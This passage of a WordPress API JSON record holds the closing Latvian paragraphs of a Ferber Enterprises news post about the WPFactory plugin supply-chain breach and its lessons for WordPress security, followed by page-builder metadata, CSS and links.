n\u0101kotne<\/h2>\n\n\n\n<p>WPFactory incidents var\u0113tu k\u013c\u016bt par v\u0113l vienu spilgtu piem\u0113ru kiberdro\u0161\u012bbas probl\u0113m\u0101m, ar kur\u0101m saskaras atv\u0113rt\u0101 koda t\u012bmek\u013ca ekosist\u0113ma.<\/p>\n\n\n\n<p>WordPress darbinap\u016b\u0161 milz\u012bgu da\u013cu no glob\u0101l\u0101s interneta ekonomikas. Jebkur\u0161 liela m\u0113roga kompromiss, kas ietekm\u0113 spraud\u0146u izstr\u0101d\u0101t\u0101jus, t\u0101p\u0113c var rad\u012bt sekas, kas sniedzas daudz t\u0101l\u0101k par atsevi\u0161\u0137\u0101m vietn\u0113m.<\/p>\n\n\n\n<p>T\u0101 k\u0101 uzbruc\u0113ji arvien vair\u0101k piev\u0113r\u0161as pieg\u0101des \u0137\u0113des kompromit\u0113\u0161anai un sl\u0113pt\u0101m ilgtermi\u0146a ietekmes metod\u0113m, spraud\u0146u dro\u0161\u012bbu vairs nevar uzskat\u012bt par sekund\u0101ru jaut\u0101jumu. M\u0113s, Ferber Enterprises, uzskat\u0101m, ka \u0161is notikums ir b\u016btisks atg\u0101din\u0101jums par to, ka kiberdro\u0161\u012bba noz\u012bm\u0113 ne tikai pa\u0161u t\u012bmek\u013ca viet\u0146u aizsardz\u012bbu, bet ar\u012b katra programmat\u016bras izplat\u012b\u0161anas \u0137\u0113des posma dro\u0161\u012bbas nodro\u0161in\u0101\u0161anu.<\/p>\n\n\n\n<p>Uztic\u0113\u0161an\u0101s atv\u0113rt\u0101m ekosist\u0113m\u0101m ir atkar\u012bga no caursp\u012bd\u012bguma, \u0101tras rea\u0123\u0113\u0161anas uz incidentiem un stingr\u0101m operat\u012bv\u0101s dro\u0161\u012bbas praks\u0113m. WordPress ekosist\u0113ma tagad saskaras ar noz\u012bm\u012bgu br\u012bdi.<\/p>\n\n\n\n<p>Tas, k\u0101 izstr\u0101d\u0101t\u0101ji, repozitoriju uztur\u0113t\u0101ji, hostingu nodro\u0161in\u0101t\u0101ji un dro\u0161\u012bbas komandas rea\u0123\u0113s uz \u0161\u0101diem incidentiem, noteiks, vai WordPress var\u0113s saglab\u0101t uztic\u012bbu miljoniem uz\u0146\u0113mumu un organiz\u0101ciju, kas uz to pa\u013caujas ik dienas.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/lv\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lv\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}